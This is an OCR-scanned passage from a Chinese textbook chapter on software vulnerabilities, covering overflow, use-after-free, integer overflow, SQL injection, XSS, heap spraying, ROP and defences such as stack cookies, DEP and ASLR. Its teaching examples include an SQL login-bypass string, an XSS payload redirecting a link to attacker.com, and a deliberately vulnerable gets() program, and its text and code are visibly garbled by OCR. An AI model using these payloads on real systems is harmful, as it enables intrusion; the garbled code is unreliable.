绍 目 前 较为 常用 的 漏洞 分 类 标准 。 以 漏洞 利用 的 位 置 为 标准 进行 分 类 ,可 分 为 本 地 漏洞 
和 远程 漏洞 两 种 。 本 地 漏洞 的 攻击 代码 需要 在 目标 主机 上 运行 ,主要 为 提 权 漏洞 .本 地 溢 
出 漏洞 等 。 远 程 漏洞 通常 无 须 在 目标 主机 系统 上 运行 ,而 是 通过 网 络 访问 向 目标 主机 发 
送 攻击 数据 包 , 获 得 远程 主机 的 控制 权 ` 添 加 用 户 或 执行 远程 控制 代码 。 

按照 产生 机 理 的 标准 对 漏洞 进行 划分 ,可 大 致 分 为 非 控 制 流 劫持 类 漏洞 和 控制 流动 
持 类 漏洞 两 类 。 控 制 流动 持 类 漏洞 使 得 程序 的 控制 流转 移 目 标 地 址 能 够 被 输入 数据 所 控 
制 ,因而 可 通过 算 改 控制 流 相关 的 数据 (例如 函数 指针 、 函 数 返回 地 址 等 ) 来 支持 程序 执行 
权 , 通 过 插入 代码 或 者 重用 已 有 程序 代码 来 实现 利用 攻击 的 目的 。 非 控制 流 劫持 类 漏洞 
中 ,攻击 者 无 法 直接 控制 程序 控制 流 , 但 能 够 通过 其 他 方式 影响 程序 的 执行 逮 辑 ,针对 此 
类 漏洞 的 攻击 通常 以 修改 应 用 程序 相关 的 关键 敏感 数据 为 目的 ,如 配置 数据 ,用 户 输入 数 
据 、 用 户 身 份 信息 和 与 关键 条 件 判断 相关 的 数据 等 。 

软件 漏洞 的 利用 指 的 是 利用 软件 内 部 存在 的 缺陷 ,达到 在 该 软件 的 正常 运行 过 程 中 
无 法 达到 的 目标 的 过 程 。 软 件 漏洞 利用 包括 执行 代码 、 信 息 窃取 、 权 限 提升 、 拒 绝 服务 、 绕 
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过 认证 机 制 等 多 种 类 型 。 本 章 在 9. 3 节 对 软件 漏洞 的 具体 利用 方法 展开 详细 论述 。 
e 执行 代码 。 通 常 也 被 称 为 控制 流 劫持 ,通过 让 程序 的 控制 流转 移 到 攻击 者 输入 的 


数据 ,使 输入 数据 作为 代码 执行 ,或 利用 程序 已 加 载 的 代码 构造 特殊 的 攻击 过 程 ， 
从 而 达到 在 远程 系统 或 本 地 系统 中 安装 控制 程序 、 运 行 敏感 命令 的 目标 。 执 行 代 
码 是 当前 大 部 分 攻击 的 主要 方式 ,通常 针对 堆 溢 出 、 栈 溢出 、 释 放 后 使 用 、 格 式 化 
字符 串 等 漏洞 实现 。 

信息 窃取 。 该 利用 方式 通常 利用 不 同 代码 的 竞争 条 件 ,数据 读 写 范 围 检 查 不 严 等 
缺陷 ,通过 构造 特定 的 输入 数据 来 干扰 程序 不 同 线程 或 分 支 迎 辑 , 达 到 访问 本 来 
不 可 访问 的 数据 ,对 敏感 数据 进行 读 、 写 ,甚至 是 通过 网 络 远程 发 送 所 窃取 信息 的 
目标 。 

权限 提升 。 该 利用 方式 通过 构造 特殊 的 输入 数据 ,修改 程序 的 关键 变量 ,或 利用 
具有 高 级 系统 权限 的 程序 执行 攻击 者 的 代码 ,使 攻击 者 能 够 获得 高 级 系统 权限 ， 
进而 达到 获取 所 期 望 的 数据 操作 和 系统 控制 能 力 的 目标 。 

拒绝 服务 。 该 利用 方式 主要 是 通过 畸形 输入 使 系统 服务 崩溃 ,或 通过 精心 构造 的 
输入 获得 系统 某 些 服务 的 控制 权限 ,进而 停止 或 攻击 重要 服务 ,或 直接 破坏 服务 
内 存 数据 导致 其 崩溃 ,形成 拒绝 服务 攻击 。 

认证 绕 过 。 通 过 特定 的 输入 ,使 程序 进入 由 于 设计 下 漏 产生 的 迎 辑 路 径 ,利用 认 
证 系统 的 漏洞 ,获得 系统 访问 权限 或 执行 非 授权 的 操作 。 通 常 认 证 绕 过 利用 的 主 
要 目标 是 提升 权限 并 访问 敏感 数据 。 





软件 漏洞 的 危害 包括 程序 崩溃 主机 被 远程 控制 ,数据 被 抹 除 ,关键 数据 失窃 、 权 限 验 
证 或 安全 防护 机 制 被 绕 过 等 。 从 对 计算 机 系统 的 危害 \ 用 户 数据 的 危害 方面 进行 区 分 , 软 
件 漏洞 产生 的 危害 主要 包括 3 个 方面 : 

。 计算 机 用 户 权限 受到 危害 。 攻 击 者 利用 漏洞 提升 自己 在 目标 计算 机 系统 中 的 权 
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限 ,达到 获取 目标 计算 机 部 分 关键 功能 控制 权 或 全 面 控制 目标 计算 机 的 目的 。 
计算 机 系统 遭 到 破坏 。 例 如 使 用 拒绝 服务 漏洞 使 目标 主机 开放 的 服务 痊 痪 ,导致 
目标 操作 系统 崩溃 ,甚至 某 些 情况 下 导致 系统 的 硬件 损毁 。 

计算 机 信息 被 泄露 和 利用 。 攻 击 者 利用 系统 漏洞 ,从 目标 终端 的 内 存 、 硬 盘 等 存 
储 介质 中 获取 密码 ,证书 文件 等 隐私 信息 。 


软件 漏洞 典型 类 型 


在 前 面 的 论述 中 提 到 软件 漏洞 可 分 为 控制 流 劫持 类 漏洞 和 非 控制 流 劫持 类 漏洞 。 本 


Torres 
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释放 后 重用 漏洞 CUAF)、 整 数 溢出 漏洞 等 ,以 及 部 分 非 控制 流 劫持 类 漏洞 ,包括 





SQL 注入 漏洞 、 跨 站 脚本 漏洞 (XSS) 等。 本 节 所 举 漏洞 示例 若非 特别 说 明 , 均 以 
Windows 操作 系统 为 底层 运行 平台 。 


1 


. 栈 溢出 漏洞 


栈 溢出 漏洞 产生 的 原因 是 程序 员 编 写 的 代码 未 能 检查 输入 数据 是 否 超 出 了 栈 空间 的 


大 小 ， 


导致 向 栈 中 写 人 了 超出 其 数据 区 域 容 纳 能 力 的 数据 ,覆盖 了 栈 中 的 其 他 数据 , 当 被 
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覆盖 的 数据 被 正常 代码 引用 时 ,引起 程序 控制 流转 移 方向 ,被 攻击 者 劫持 。 栈 溢出 漏洞 产 
生 的 根本 原因 是 操作 系统 的 函数 调用 与 栈 操作 机 理 : 函数 调用 基于 栈 实现 , 栈 为 下 推 式 
操作 ,发 生 函 数 调用 时 , 先 向 栈 中 压 和 人 返回 地 址 ,然后 继续 向 下 开辟 局 部 变量 空间 ,函数 的 
返回 地 址 在 函数 自身 局 部 变量 的 上 方 , 导 致 在 函数 操作 自身 局 部 变量 时 因 越 界 读 写 而 改 
AE, 假设 有 函数 A 和 函数 B, 原 理 如 图 9-1 所 示 , 在 函数 A 调用 函数 B 时 ,数据 的 入 栈 顺 
序 为 参数 1、 参 数 2 参数 3、 返回 地 址 。 其 中 函数 B 的 输入 参数 、 返 回 地 址 被 放 在 堆栈 的 
高 地 址 空间 内 ,而 函数 B 的 局 部 变量 被 放 在 栈 的 低地 址 空间 , 当 函 数 B 写 入 数据 时 ,数据 
由 低地 址 空间 向 高 地 址 空间 延伸 。 当 写 入 的 范围 超过 了 局 部 数据 定义 的 长 度 时 ,函数 B 
的 返回 地 址 被 输入 数据 所 覆盖 。 










































高 
地 
址 
局 部 变量 A 
NR 
局 部 变量 B 
k 局 部 变量 NS 
图 9-1 ， 栈 溢出 漏洞 原理 
2. 堆 溢出 漏洞 


堆 溢 出 通常 指 的 是 向 堆 中 写 入 数据 时 没有 严格 检验 数据 长 度 , 导 致 写 入 范围 大 于 堆 
的 大 小 ,覆盖 了 堆 后 续 的 数据 。 堆 溢出 漏洞 主要 包括 两 种 类 型 ,一 种 是 后 续 堆 的 管理 结构 
被 覆盖 , 另 一 种 是 后 续 堆 的 数据 内 容 被 覆盖 。 与 栈 溢出 不 同 ,在 堆 管 理 结构 被 覆盖 引起 的 
漏洞 中 ,能 否 被 利用 的 关键 在 于 操作 系统 的 堆 分 配 和 释放 机 理 , 对 于 后 续 堆 内 容 被 覆盖 的 
漏洞 ,能 否 被 利用 的 关键 在 于 被 覆盖 的 堆 中 是 否 存 在 虚 函 数 指针 等 敏感 数据 。 

D 覆盖 堆 管 理 结构 

堆 溢 出 引起 堆 管理 结构 被 覆盖 ,利用 了 Windows(Windows XP SP1 之 前 的 系统 ) 堆 
释放 函数 未 能 对 双 链 表 指 针 进行 完整 性 检验 的 特点 ,使 得 该 管理 函数 在 对 堆 进行 释放 操 
作 时 ,由 于 操作 的 逻辑 的 不 严谨 而 被 攻击 者 利用 ,其 原理 如 图 9-2 所 示 。 

假设 Heapl 和 Heap2 是 两 个 相 邻 的 堆 ,由 于 程序 读 和 人 了 超 长 的 数据 ,其 写 的 范围 超 
过 了 Heapl 的 长 度 ,覆盖 了 Heap2 的 堆 结构 。 操 作 系统 在 释放 Heap2 的 数据 结构 时 , 回 
收 链表 的 伪 代 码 为 


int Unlink (ListNode * node) 

$ 
node->blink-> flink=node-> flink; 
node- » flink- »blink-node- » blink; 
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(a) 正常 的 堆 链表 状态 
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(b) 覆盖 的 堆 链 表 状态 
图 9-2 覆盖 堆 管 理 结构 的 堆 洲 出 漏洞 


return 0; 


} 


此 处 的 目标 地 址 和 内 容 能 够 被 覆盖 ,因而 攻击 者 能 够 将 一 个 可 控制 的 数值 填写 到 预 
想 位 置 。 这 种 攻击 通常 被 称 为 DWORD Shoot。 由 于 能 够 向 内 存 的 任意 地 址 写 入 任意 一 
个 双 字 , 当 控 制 流转 移 方向 和 攻击 代码 能 够 在 内 存 中 被 确定 时 ,该 攻击 能 够 达到 非常 好 的 
效果 。 

2) 覆盖 后 续 堆 的 数据 

堆 溢 出 还 存在 另外 一 种 情况 , 即 后 续 堆 的 内 容 被 覆盖 ,该 情况 的 产生 原因 通常 是 程序 
编写 者 没有 检查 输入 数据 的 长 度 , 导 致 在 申请 的 堆 空 间 大 小 不 足 , 进 而 后 续 的 内 存 空间 也 
被 覆盖 。 很 多 情况 下 ,后 续 数据 区 域 可 能 存放 着 敏感 信息 ,如 函数 指针 等 ,因而 此 类 漏洞 
也 能 够 被 用 来 做 漏洞 攻击 。 堆 溢出 漏洞 的 一 个 典型 例子 是 CVE 2014-1761( 该 例子 在 
9.2.4 节 详细 论述 ) ,由 于 代码 没有 检查 输入 数据 的 长 度 ,该 漏洞 覆盖 了 后 续 堆 中 的 函数 
指针 ,在 程序 执行 到 基于 该 函数 指针 的 调用 时 ,控制 流 被 转移 到 攻击 者 设想 的 位 置 。 
图 9-3 是 覆盖 后 续 堆 中 虚 函 数 指针 的 情况 示意 图 。 
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图 9-3 ”后 续 堆 被 覆盖 的 情况 
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3. 释放 后 重用 漏洞 

释放 后 重用 (Use After Free,UAF) 漏 洞 的 机 理 是 已 经 被 释放 的 对 象 或 内 存 被 某 段 
代码 错误 地 认为 还 没有 释放 ,该 代码 引用 已 经 释放 的 对 象 或 内 存 而 引起 程序 错误 ,基于 该 
错误 ,攻击 者 可 以 在 该 对 象 刚刚 被 释放 后 通过 另 一 次 内 存 申 请 获取 其 访问 权限 ,然后 修改 
其 内 容 , 该 对 象 被 错误 地 引用 时 可 以 实现 攻击 者 的 意图 。 若 存在 释放 后 重用 的 对 象 或 内 
存 为 函数 指针 , 则 攻击 者 通过 修改 函数 指针 的 内 容 能 够 达到 控制 流动 持 的 目的 。UAF 产 
生 的 原因 在 于 操作 系统 自身 的 内 存 管 理 机 制 , 如 果 某 个 内 存 块 的 大 小 小 于 操作 系统 规定 
的 某 个 值 (通常 为 256KB) ,在 该 内 存 块 被 程序 释放 后 ,操作 系统 并 不 会 马上 释放 其 空间 
和 记录 ,而 是 把 内 存 块 标记 为 空闲 状态 ,并 将 空闲 的 内 存 块 放 入 快 表 中 , 供 程序 下 次 申请 
内 存 使 用 。 因 而 程序 后 续 操作 申请 相同 大 小 的 内 存 时 ,很 有 可 能 获取 的 是 程序 前 面 释放 
的 内 存 。 

假设 存在 一 个 对 象 A, 该 对 象 向 操作 系统 申请 了 另 一 个 对 象 B, 记 录 了 B 的 指针 。 如 
果 对 象 B 被 释放 , 当 后 续 函 数 申请 内 存 时 ,可 能 分 配 到 之 前 存放 对 象 B 的 那 一 块 。 此 时 
对 象 A 引用 对 象 B 的 指针 ,会 进入 到 后 续 指令 修改 到 的 目标 地 址 ,进而 形成 UAF 漏洞 ， 
如 图 9-4 所 示 。 
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图 9-4 UAF 漏洞 原理 
4. 整数 溢出 漏洞 


整数 溢出 漏洞 是 近年 来 漏洞 分 析 的 一 个 热点 ,其 形成 的 主要 原因 在 于 程序 对 于 整 型 
数据 类 型 的 类 型 转换 比较、 计算 等 操作 在 编译 器 实现 中 的 朴 漏 ,该 漏洞 利用 的 主要 目标 
仍然 是 覆盖 堆 或 栈 中 的 内 容 。 在 CC 等 程序 设计 语言 中 ,整数 有 一 定 取 值 范围 ,通常 
情况 下 超过 范围 的 整数 会 产生 溢出 ,一 般 不 构成 安全 隐患 ,但 如 果 这 个 整数 表示 的 是 分 配 
内 存 的 长 度 , 则 可 能 发 生 整数 溢出 。 整 数 溢出 可 划分 为 宽度 溢出 (widthness overflow) 和 
算术 溢出 (arithmetic overflow)。 一 个 较为 典型 的 宽度 溢出 的 用 例如 下 : 


int main (int argc, char * argv[]) 
{ 

unsigned short s; 

int i; 


char buf[80]; 
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i=atoi (argv[1]); // 攻 击 者 可 向 argv[1] 输 入 超过 short 表示 范围 的 整数 

sci; // 在 由 int 型 转化 为 unsigned short 型 时 截断 ,得 到 了 一 
// 个 看 上 去 合理 的 整数 ,此 时 = 与 i 在 数值 上 不 相等 ,通常 = 
IIT i 

if (s »-80)( // 针 对 被 截断 的 短 整 型 进行 边界 检查 ,而 非 对 输入 得 到 的 变 
// 量 工 的 数值 进行 检查 


printf ("input number is too large!"); 
return -1; 
} 
memcpy (buf, argv[2], i); // 复 制 长 度 使 用 了 i, 而 前 面 判 断 的 是 s, 发 生 溢出 
return 0; 
} 
算术 溢出 通常 在 C 语言 ,Java 语言 实现 的 代码 中 出 现 ,其 原因 是 C 语言 包含 符号 整 
数 运 算 与 无 符号 整数 运算 ,如 果 两 个 数 都 是 相同 类 型 的 整 型 , 则 按照 其 现 有 类 型 进行 计 
算 ; 如 果 两 个 数 一 个 为 有 符号 整 型 , 男 一 个 为 无 符号 整 型 , 则 首先 将 有 符号 整 型 转换 为 无 
符号 整 型 ,然后 进行 计算 。 在 C 语言 标准 的 定义 中 ,对 于 有 符号 整 型 计算 并 没有 详细 的 
定义 ,也 即 溢出 结果 如 何 表示 没有 统一 的 标准 ,因而 不 同 的 编译 器 很 可 能 给 出 不 同 的 结 
果 。 当 有 符号 数 运算 结果 发 生 溢出 时 ,很 可 能 跟 预 先 假设 的 溢出 结果 不 同 ,导致 程序 中 出 
现 安全 问题 。 算 术 溢 出 的 例子 在 9. 2 节 给 出 了 一 个 实例 进行 具体 分 析 。 
5. 其 他 类 型 漏洞 
除了 控制 流 劫持 漏洞 以 外 ,还 有 很 多 复杂 的 漏洞 难以 提出 不 同 的 分 类 方法 进行 区 分 ， 
利用 这 些 漏 洞 通常 不 会 出 现 控制 流 异常 ,其 中 最 有 名 和 影响 最 广泛 的 漏洞 是 SQL 注入 漏 
iW fI XSS 漏洞 。 
1) SQL 注入 漏洞 
SQL 注入 漏洞 形成 的 主要 原因 是 程序 员 没有 对 用 户 输入 数据 的 合法 性 进行 判断 ,使 
攻击 者 可 以 通过 在 输入 中 插 和 人 数据库 查询 代码 的 方式 改变 程序 的 验证 结果 ,或 根据 程序 
返回 的 结果 获得 某 些 攻击 者 想 得 知 的 数据 。 
假设 某 个 网 站 的 登录 验证 的 SQL 查询 代码 为 


StrSQL-"SELECT * FROM users WHERE (name= '" +username +"') and (pu- '"tpassword +"');" 
攻击 者 在 正常 的 输入 后 加 上 数据 库 查 询 指令 OR I 一 水 ,作为 输入 提交 给 网 页 表单 : 
username= "1' OR '1'- '1"; 与 password- "1' OR '1'- '1"; 

该 输入 将 导致 原本 的 SQL 字符 串 被 填 为 

StrSQL-"SELECT * FROM users WHERE (name- '1' OR '1'— '1') and (pw='1' OR '1'='1');" 


由 于 输入 中 的 OR '1'=='1' 的 条 件 永远 为 真 ,实际 上 运行 的 SQL 命令 将 与 单独 的 
SELECT 命令 等 价 : 


strSQL- "SELECT * FROM users;" 


mom weeds oni: IC 

此 时 即使 没有 账号 和 密码 ,也 能 够 直接 登录 网 站 。 

2) XSS 漏洞 

XSS(Cross Site Scripting) 的 全 称 是 跨 站 脚本 漏洞 , 跨 站 脚本 是 一 种 经 常 出 现在 Web 
应 用 中 的 计算 机 安全 漏洞 , 它 允 许 恶意 Web 用 户 将 代码 植 人 到 提供 给 其 他 用 户 使 用 的 页 
面 中 。XSS 攻击 要 求 用 户 访问 一 个 被 攻击 者 复 改 后 的 链接 ,用 户 访问 该 链接 时 ,被 植 人 
的 攻击 脚本 被 用 户 浏览 器 执行 ,从 而 达到 攻击 目的 。 下 面 介绍 KSS 的 原理 。 假 设 有 以 下 
index. php 页 面 : 

«?php 

$name-$ GET['name']; 

echo "Welcome to our site, $name«br»"; 

echo "<a href- "http://xss.cn/"» Click to Download /a» "; 

gm 

该 页 面 显 示 两 行 信息 ,从 浏览 器 提交 的 URL. 获取 "name! 参数 ,并 在 页 面 显示 ,同时 
显示 跳 转 到 一 条 URL 的 链接 。 如 果 攻 击 者 在 代码 中 嵌入 攻击 脚本 内 容 ,输入 时 采用 如 
下 的 参数 

index.php? name- guest< script» alert ('attacked')« /script> 

当 用 户 单 击 该 链接 时 ,攻击 者 提交 的 脚本 内 容 会 被 执行 , 带 'attacked' 的 告警 提示 框 弹 
出 。 更 进一步 ,如 果 攻 击 者 提交 一 个 URL 实现 修改 链接 ,用 户 将 可 能 会 跳 转 至 攻击 者 提 
供 的 链接 。 


index.php? name=< script» window.onload- function() { 
var link= document.getElementsByTagName ("a"); link [0]. hre£- "http://attacker.com/";)«/ 


Script» 
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软件 漏洞 利用 , 指 的 是 利用 软件 内 部 缺陷 以 实现 在 该 软件 的 正常 运行 过 程 中 无 法 达 
到 的 目的 。 此 外 ,有 时 漏洞 利用 (exploit) 也 指 漏洞 攻击 代码 , 即 针 对 某 一 特定 的 软件 缺陷 
精心 构造 的 输入 数据 ,通过 让 目标 系统 或 程序 处 理 该 数据 ,能 够 达到 获取 主机 控制 权 、 窃 
取 数 据 、 运 行 可 执行 代码 等 目的 。 漏 洞 利 用 生成 的 方法 可 分 为 3 类 : 第 一 类 是 借助 于 
WinDbg、Immunity Debugger 等 调试 工具 ,通过 手工 分 析 生 成 漏洞 利用 ,该 方法 主要 依赖 
于 分 析 人 员 的 经 验 和 能 力 , 生 成 效率 低 , 需 要 投入 大 量 的 人 力 和 物力 来 探究 漏洞 机 理 和 实 
现 漏洞 利用 ;第 二 类 是 使 用 MetaSploit 等 漏洞 利用 生成 工具 快速 生成 所 需 的 攻击 代码 ， 
或 使 用 辅助 性 工具 例如 Mona, ROPGadget 等 ,搜寻 到 所 有 可 用 于 构造 ROP 的 代码 片段 ， 
经 过 调试 .筛选 .调整 等 步骤 ,最 终 形 成 可 利用 的 攻击 代码 ,这 一 类 方法 相对 于 全 手工 的 分 
析 方 法 在 自动 化 程度 上 有 一 定 提高 ,但 是 仍然 需要 较 大 的 人 力 投 入 ;第 三 类 ,也 是 当前 理 
论 和 实践 研究 的 重要 方向 ,是 借助 于 动态 数据 流 分 析 方 法 等 各 类 程序 分 析 方 法 自动 生成 
漏洞 利用 ,该 方法 自动 化 程度 高 ,但 仍 有 许多 问题 有 待 解决 ,是 当前 学 术 研究 的 热点 。 

下 面 举 一 个 例子 说 明 漏洞 利用 的 基本 概念 。 以 下 示例 代码 模拟 了 一 个 存在 栈 溢 出 漏 
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洞 的 用 户 认证 程序 。 用 户 只 有 输入 正确 的 密码 happiness 时 才能 通过 验证 ,程序 会 在 控 
制 台 屏幕 上 打印 “密码 正确 ”以 及 “当前 用 户 获得 ROOT 权限 *。 反 之 , 若 输入 密码 不 正 
































确 , 则 会 打印 “密码 错误 ”。 
1 #include <stdio.h> 
2 #include <string.h> 
3 intmain(void)( 
4 char buff[15]; 
5 int pass-0; 
6 printf (" 输 入 密码 : An"); 
7 gets (buff); 
8 if (strcmp (buff, "happiness")) ( 
9 printf ("密码 错误 Ww"); 
10 ) else{ 
1 printf ("密码 正确 o") ; 
12 pass-1; 
33 } 
14 if (pass) { 
35 printf (" 当 前 用 户 获 得 Roor 权限 \n"); 
16 ) 
17 return 0; 
18 | 
该 程序 运行 时 的 栈 如 图 9-5. 所 示 , 用 户 如 果 输 入 超 长 字符 串 ,会 覆盖 pass 变量 和 返 
回 地 址 。 
高 返回 地 址 
地 
址 
pass 
buf[14] 
buf[1] 
低 buf[0] 
地 
址 
Bes Be 


通过 分 析 源 代码 不 难 发 现 ,攻击 者 要 在 不 知道 密码 的 情况 下 绕 过 认证 ,只 需要 输入 超 
长 字符 串 覆 盖 pass 变量 ,并且 使 其 不 为 0 即 可 ( 见 代码 第 14 行 )。 因 此 ,攻击 者 可 直接 输 
入 超过 15 个 字符 的 字符 串 , 同 时 只 要 第 16 个 字符 不 为 0, 这 样 就 可 以 确保 覆盖 pass 局 部 
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变量 , 绕 过 密码 认证 。 例 如 ,直接 输入 16 个 大 写字 母 AAAAAAAAAAAAAAAA 就 能 
构成 一 个 漏洞 利用 ,实现 绕 过 程序 认证 机 制 的 目标 。 这 里 介绍 的 漏洞 利用 没有 实现 控制 
流 劫持 , 仅 用 来 说 明 漏洞 利用 的 基本 概念 。 

控制 流 劫持 类 的 漏洞 利用 除了 修改 程序 执行 流程 之 外 还 要 绕 过 底层 运行 平台 的 各 种 
安全 保护 机 制 才能 真正 发 挥 作 用 ,因此 这 里 简要 介绍 漏洞 利用 中 绕 过 操作 系统 防护 机 制 
的 各 种 方法 ,主要 包括 针对 GS 栈 帧 监测 、SafeSEH 等 保护 机 制 的 内 存 喷射 技术 ,针对 
DEP( 数 据 流 执行 保护 ) 机 制 的 ROP 技术 ,以 及 针对 ASLR( 地 址 随机 化 ) 机 制 的 内 存 地 址 
信息 泄露 等 。 

1. 内 存 喷射 技术 

内 存 喷 射 技 术 的 代表 是 堆 喷射 (heap spray) ,主要 用 于 攻击 IE, Firefox 浏览 器 、 
Adobe Reader 等 常用 软件 或 其 中 的 第 三 方 插件 。 传 统 堆 喷射 技术 的 关键 在 于 ,在 内 存 中 
申请 大 量 的 具有 固定 大 小 的 对 象 ,将 对 象 十 和 人 相同 内 容 , 每 一 个 对 象 中 间 都 含有 若干 
NOP 指令 序列 和 攻击 代码 ,这 样 就 使 得 进程 的 地 址 空间 被 大 量 的 注入 代码 所 占据 。 在 程 
序 的 控制 流 被 劫持 时 ,大 量 的 包含 攻击 代码 的 碎片 能 够 提高 EIP 转移 达到 目标 的 概率 ， 
碎片 中 的 NOP 指令 形成 指令 缓冲 区 ,使 得 EIP 转移 目标 仅 需 要 在 一 定 的 误差 范围 内 , 即 
可 引发 攻击 代码 的 执行 。 

2. ROP 攻击 技术 

在 地 址 随机 化 和 数据 执行 保护 技术 被 广泛 应 用 的 情况 下 ,传统 的 堆栈 溢出 攻击 方法 
受到 了 极 大 的 影响 ,攻击 者 很 难 直 接 跳 转 并 执行 攻击 代码 ,为 了 解决 这 一 问题 , ROP 
(Return-Oriented Programming) 被 提出 ,其 核心 思路 是 从 已 有 的 库 或 可 执行 文件 中 提取 
指令 片段 ,构建 攻击 代码 。 具 体操 作 方 式 是 : 寻找 进程 空间 中 没有 被 地 址 随机 化 的 模块 ， 
从 中 搜索 符合 数据 操作 指令 序列 要 求 , 并 以 ret 指令 结尾 的 指令 片段 (gadget)。 将 具备 不 
同 功能 的 指令 片段 的 地 址 按照 攻击 代码 的 要 求 进行 组 合 ,并 依 此 构造 输入 数据 ,使 得 前 述 
指令 片段 能 够 置 于 程序 运行 栈 上 。 漏 洞 实 际 触发 时 会 以 rec 返回 指令 实现 指令 片段 执行 
流 的 衔接 ,使 得 这 些 指令 片段 能 够 依次 执行 ,并 完成 某 些 特定 的 操作 。 特 定 操作 包括 关闭 
DEP 保护 ,或 者 更 改 攻击 代码 所 在 内 存 页 面 的 属性 ,甚至 直接 执行 攻击 代码 等 。 

3. 基于 内 存 地址 信息 泄露 构造 利用 

控制 流动 持 类 漏洞 攻击 的 关键 在 于 使 控制 流转 移 的 目标 落 在 由 NOP 或 攻击 代码 组 
成 的 缓冲 区 里 。 在 Vista 以 及 之 前 的 系统 中 ,通常 很 少 有 模块 进行 地 址 随机 化 ,或 随机 化 
范围 很 小 ,在 构造 ROP 时 ,很 容易 从 未 随机 化 的 代码 中 选择 ROP 代码 片段 。 在 之 后 的 系 
统 中 ,由 于 DEP 和 ASLR 的 同时 使 用 ,使 得 攻击 者 即使 能 找到 ROP 代码 片段 ,也 很 难 在 
内 存 中 关联 起 来 。 

针对 该 问题 ,攻击 者 目前 主要 采用 两 种 方法 。 第 一 种 方法 是 在 代码 中 寻找 未 随机 化 
的 模块 ,由 于 该 模块 每 次 加 载 的 地 址 都 相同 ,在 该 模块 中 找到 的 gadget 能 够 确保 程序 在 
每 次 运行 时 ,各 个 ROP 代码 片段 能 正确 执行 ,而 不 受 ASLR 的 影响 。 

第 二 种 方法 针对 全 部 模块 都 被 随机 化 的 情况 ,利用 程序 在 运行 时 泄露 的 信息 来 构造 
ROP。 这 种 方式 需要 程序 自身 存在 内 存 地 址 信息 泄露 的 缺陷 。 内 存 地 址 信息 泄露 是 指 
通过 缓冲 区 溢出 、 任 意 地 址 写 等 各 种 方式 获得 某 些 关键 数据 的 地 址 ,这 些 地 址 信息 通常 包 
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括 当 前 模块 加 载 基 地 址 、 模 块 内 某 个 虚 函 数 指针 地 址 信息 等 。 攻 击 者 能 够 根据 这 些 泄露 
信息 ,通过 动态 运算 定位 到 所 需 的 模块 。 由 于 ASLR 并 不 改变 模块 中 数据 的 相对 偏 移 ， 
因而 结合 之 前 在 模块 中 搜索 得 到 的 代码 片段 构造 ROP 链 , 能 够 最 终 实现 漏洞 利用 。 例 
如 ,攻击 者 可 通过 缓冲 区 溢出 修改 BSTR 对 象 的 长 度 ,然后 利用 BSTR 去 控制 超出 边界 
的 内 存 , 从 而 可 以 泄露 内 存 地 址 ,精确 找到 可 以 构造 ROP 的 DLL 模块 基地 址 。 
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针对 软件 漏洞 的 形成 机 理 和 利用 方法 ,研究 人 员 也 提出 了 与 之 对 应 的 防护 方法 ,主要 
包括 针对 栈 溢出 的 Stack Cookie, 针 对 堆 溢 出 的 SAFE 堆 释 放 操 作 , 针 对 控制 流动 持 攻 击 
的 数据 区 执行 保护 (Data Execution Protection, DEP) 和 地 址 随机 化 (Address Space 
Layout Randomization,ASLR) 等 机 制 。 

针对 栈 溢出 的 Stack Cookie 方法 是 在 堆栈 中 保存 一 个 cookie (£ 44 16) (E, HE FE Bk 
溢出 时 ,该 数据 则 会 被 覆盖 。 操 作 系 统 在 提取 和 恢复 堆栈 数据 时 ,会 将 预先 保存 的 值 和 从 
堆栈 中 取出 的 cookie 值 进行 比较 ,如 果 cookie 和 事先 保存 的 数据 不 相同 , 则 系统 认为 堆 
栈 受 到 了 攻击 ,不 再 执行 该 程序 后 续 的 代码 。 其 主要 原理 如 图 9-6 所 示 。 





高 
地 
址 
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返回 地 址 





SEH 节 点 





入 栈 寄存 器 





security_cookie 





HER 











局 部 变量 
图 9-6 Stack Cookie 原理 


DEP 面 对 的 主要 目标 是 缓冲 区 溢出 ,缓冲 区 溢出 攻击 需要 在 程序 存放 数据 的 区 域 写 
人 可 执行 的 攻击 代码 ,然后 劫持 控制 流转 移 到 攻击 代码 。DEP 的 目标 即 为 制止 该 过 程 ， 
其 设计 原理 是 , Windows 利用 DEP 标记 只 包含 数据 的 内 存 位 置 为 非 可 执行 状态 (Not 
Executable, NX) , 当 应 用 程序 试图 从 标记 为 NX 的 内 存 位 置 执 行 代码 时 ,系统 将 报告 一 
个 数据 访问 异常 , Windows 的 异常 处 理 将 阻止 应 用 程序 执行 数据 区 域 中 的 代码 ,从 而 达 
到 截断 非法 控制 流转 移 ,保护 系统 防止 溢出 的 目的 。DEP 可 采用 硬件 DEP 和 软件 DEP 
两 种 方式 实现 。 硬 件 DEP 需要 处 理 器 的 支持 ,软件 DEP 由 Windows 操作 系统 在 系统 内 
存 中 为 保存 的 数据 对 象 自 动 添加 的 一 组 特殊 指针 提供 。 

地 址 空间 布局 随机 化 (ASLR) 也 被 直接 称 作 地 址 随机 化 ,是 一 种 针对 缓冲 区 溢出 的 
安全 保护 技术 ,通过 对 堆 \ 栈 动态 库 等 布局 的 随机 化 ,增加 攻击 者 预测 目的 地 址 的 难度 ， 
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防止 攻击 者 直接 定位 攻击 代码 位 置 , 达 到 阻止 溢出 攻击 的 目的 。 研 究 表明 ,ASLR 可 以 有 
效 地 降低 缓冲 区 溢出 攻击 的 成 功率 ,当前 主流 操作 系统 都 已 采用 了 该 技术 。ASLR 主要 
对 以 下 4 类 地 址 进行 随机 化 : 堆 地 址 的 随机 化 、 栈 基 址 的 随机 化 、PE 文件 映像 基 址 的 随 
机 化 、 进 程 环境 块 (Process Environment Block,PEB) 地 址 的 随机 化 。 

1. PE 文件 加 载 地 址 随机 化 

针对 可 执行 程序 的 加 载 地 址 进行 随机 处 理 ,该 地 址 是 在 系统 启动 时 确定 的 ,每 次 重启 
后 再 加 载 地 址 都 不 同 。 加 载 地 址 随机 化 可 以 通过 注册 表 来 设置 。 加 载 地 址 随机 化 使 得 使 
用 绝对 地 址 的 攻击 方式 失效 ,但 是 如 果 存 在 地 址 泄露 或 攻击 者 使 用 相对 地 址 访问 的 方式 ， 
这 种 随机 化 方式 无 法 提供 有 效 防护 。 

2. 堆栈 随机 化 

堆栈 随机 化 的 目标 是 使 堆栈 的 基 址 在 每 次 加 载 程序 时 确定 ,使 得 堆栈 的 绝对 地 址 发 
生变 化 。 但 是 ,在 缓冲 区 溢出 攻击 中 ,通常 使 用 jmp esp 等 跳 转 指令 进行 控制 流转 移 , 该 
